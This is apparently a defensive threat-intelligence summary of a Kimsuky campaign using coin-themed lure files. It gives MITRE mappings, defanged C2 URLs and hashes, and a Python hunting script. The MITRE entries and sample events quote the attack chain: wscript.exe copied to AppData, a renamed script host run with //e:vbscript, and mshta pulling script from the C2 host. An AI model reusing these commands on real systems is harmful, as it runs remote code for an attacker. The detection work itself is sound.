ASEC reports the distribution of malware disguised as coin exchange and investment content, delivered as self-extracting executables and Word documents. The operation is attributed to the Kimsuky group, and it uses macros, scripting, and URL-based commands to download additional payloads from a C2 hosted at partner24.kr. #Kimsuky #Mshta
Keypoints
- Malware distributed as coin-investment themed files, including executables and a Word document, with User-Agent evidence pointing to Kimsuky.
- Confirmed filenames include multiple 2023-era items (e.g., 20230717_030190045911.pdf .exe and others) and spoofed icons to resemble legitimate documents.
- Executables are self-extracting archives that, when opened, generate normal document files and trigger a script execution chain.
- Word document contains a VBA macro masquerading as a coin-exchange document; enabling content launches the macro.
- Macro copies wscript.exe to word.exe in AppData, then downloads a Base64-encoded script from a remote URL (kk.php) and decodes it to set.sl for execution.
- Observed malicious URLs and C2 activity (e.g., biz.php, doc1.php, doc2.php, kk.php on partner24.kr) with potential credential exfiltration and further payload deployment.
MITRE Techniques
- [T1036] Masquerading – The executables identified in Table 1 are disguised with Word document and PDF icons, making them appear like normal files. Quote: ‘The executables identified in Table 1 are disguised with Word document and PDF icons, making them appear like normal files.’
- [T1204.002] User Execution – The document asks users to enable content, manipulating them to run macros. Quote: ‘the text color in the body is set to gray, manipulating users into clicking the Enable Content button.’
- [T1059.005] VBScript – The macro downloads and executes a VBScript payload via word.exe (the copy of wscript.exe placed in AppData), e.g. ‘cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl’. Quote: ‘cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl’
- [T1218.005] Mshta – mshta.exe is used to execute the script code present in the malicious URL. Quote: ‘mshta.exe is utilized to execute the script code present in the malicious URL.’
- [T1027] Data Encoding – The macro downloads a Base64-encoded script. Quote: ‘Base64-encoded script from hxxps://partner24[.]kr/mokozy/hope/kk.php before decoding it and saving it…’
- [T1105] Ingress Tool Transfer – The macro downloads an additional script from a remote URL before execution. Quote: ‘downloads an additional Base64-encoded script from hxxps://partner24[.]kr/mokozy/hope/kk.php before decoding it’
- [T1071.001] Web Protocols – The payload communicates with web URLs (e.g., biz.php, doc1.php, doc2.php, kk.php) indicating web-based C2 activity. Quote: ‘hxxps://partner24[.]kr/mokozy/hope/biz.php’
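One way to hunt for the execution chain summarised in the Keypoints and MITRE entries above (an Office process spawning cmd, wscript.exe copied to word.exe under AppData, a renamed script host launched with //e:vbscript, and mshta.exe fetching script code from the partner24.kr URLs). This is an added example, not code from the ASEC report: the process-creation events are constructed to resemble simplified Sysmon event 1 records, the benign control events are made up, and the rule names and field names are this example's own choices.

```python
import re

# Report IoC URLs, kept defanged exactly as the summary lists them.
DEFANGED_IOC_URLS = [
    "hxxps://partner24[.]kr/mokozy/hope/biz.php",
    "hxxps://partner24[.]kr/mokozy/hope/doc1.php",
    "hxxps://partner24[.]kr/mokozy/hope/doc2.php",
    "hxxps://partner24[.]kr/mokozy/hope/kk.php",
]

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
WSH_NAMES = {"wscript.exe", "cscript.exe"}
SPAWN_WATCH = WSH_NAMES | {"cmd.exe", "mshta.exe", "powershell.exe"}


def refang(text):
    """Normalise defanged indicators (hxxp, [.]) and lower-case for matching."""
    return text.replace("hxxp", "http").replace("[.]", ".").lower()


# Host part of each IoC URL, e.g. "partner24.kr".
IOC_HOSTS = {re.sub(r"^https?://([^/]+).*$", r"\1", refang(u)) for u in DEFANGED_IOC_URLS}


def basename(path):
    """Last path component, surrounding quotes stripped, lower-cased."""
    return path.strip('"').replace("/", "\\").rsplit("\\", 1)[-1].lower()


def evaluate(event):
    """Return the names of the rules that fire on one process-creation event."""
    hits = []
    image = basename(event["image"])
    parent = basename(event.get("parent", ""))
    cmd = refang(event["cmdline"])

    # Rule 1: an Office application spawning a shell or script host (macro execution).
    if parent in OFFICE_APPS and image in SPAWN_WATCH:
        hits.append("office_spawns_script_host")

    # Rule 2: wscript.exe/cscript.exe copied under AppData (the report: wscript.exe -> word.exe).
    if image == "cmd.exe" and re.search(r"\bcopy\b.*\\(wscript|cscript)\.exe\b.*appdata", cmd):
        hits.append("wsh_copied_to_appdata")

    # Rule 3: the WSH engine switch //e:vbscript (or //e:jscript) given to a binary that
    # is not named wscript/cscript, i.e. a renamed script host such as word.exe.
    m = re.search(r"(\S+)\s+//e:(vbscript|jscript)", cmd)
    if m and basename(m.group(1)) not in WSH_NAMES:
        hits.append("renamed_wsh_engine_switch")

    # Rule 4: mshta.exe handed a URL, so script code is fetched and run from the web.
    if image == "mshta.exe" and re.search(r"https?://", cmd):
        hits.append("mshta_remote_url")

    # Rule 5: any reference to a C2 host from the IoC list.
    if any(host in cmd for host in IOC_HOSTS):
        hits.append("known_c2_host")

    return hits


def hunt(events):
    """Map event index -> firing rule names, omitting events with no hits."""
    results = {}
    for i, event in enumerate(events):
        hits = evaluate(event)
        if hits:
            results[i] = hits
    return results


# Constructed sample events (simplified Sysmon EID 1 fields); not taken from the report.
OFFICE = r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE"
SAMPLE_EVENTS = [
    {"image": OFFICE, "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE" /n "C:\Users\victim\Downloads\lure.doc"'},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": OFFICE,
     "cmdline": r"cmd /c copy C:\Windows\System32\wscript.exe C:\Users\victim\AppData\Roaming\word.exe"},
    {"image": r"C:\Windows\System32\cmd.exe", "parent": OFFICE,
     "cmdline": r"cmd /c %appdata%\word.exe //e:vbscript //b %USERPROFILE%\set.sl"},
    {"image": r"C:\Users\victim\AppData\Roaming\word.exe", "parent": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"C:\Users\victim\AppData\Roaming\word.exe //e:vbscript //b C:\Users\victim\set.sl"},
    # Written defanged here; refang() normalises it the same way as the IoC list.
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Users\victim\AppData\Roaming\word.exe",
     "cmdline": r"mshta.exe hxxps://partner24[.]kr/mokozy/hope/biz.php"},
    # Benign controls: a logon script run by the real wscript.exe, and a local HTA.
    {"image": r"C:\Windows\System32\wscript.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'"C:\Windows\System32\wscript.exe" //e:vbscript //b C:\Scripts\logon.vbs'},
    {"image": r"C:\Windows\System32\mshta.exe", "parent": r"C:\Windows\explorer.exe",
     "cmdline": r'mshta.exe "C:\Program Files\Vendor\setup.hta"'},
]

if __name__ == "__main__":
    for idx, rules in hunt(SAMPLE_EVENTS).items():
        print(idx, SAMPLE_EVENTS[idx]["cmdline"], "->", rules)
```

Rule 3 is the one worth keeping even after the partner24.kr indicators go stale: the //e: engine switch is only meaningful to Windows Script Host, so a process that is not wscript.exe or cscript.exe receiving it is a renamed script host regardless of what the copy was called.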
Indicators of Compromise
- [Hash] File hashes – 8a5fd1e9c9841ff0253b2a6f1e533d0e, 002105e21f1bddf68e59743c440e416a, 17daf3ea7b80ee95792d4b3332a3390d, and 2 more hashes
- [URL] Malicious URLs – hxxps://partner24[.]kr/mokozy/hope/biz.php, hxxps://partner24[.]kr/mokozy/hope/doc1.php, hxxps://partner24[.]kr/mokozy/hope/doc2.php, hxxps://partner24[.]kr/mokozy/hope/kk.php
- [Filename] Observed filenames – 20230717_030190045911.pdf .exe, 0728-We**Wallet Automatic Withdrawal of Funds.docx.exe (assumed), 230728 We**Team – Wallet Hacking Similarities.docx.exe (assumed), We** Team – Ban on Cloud Usage.doc
Read more: https://asec.ahnlab.com/en/55944/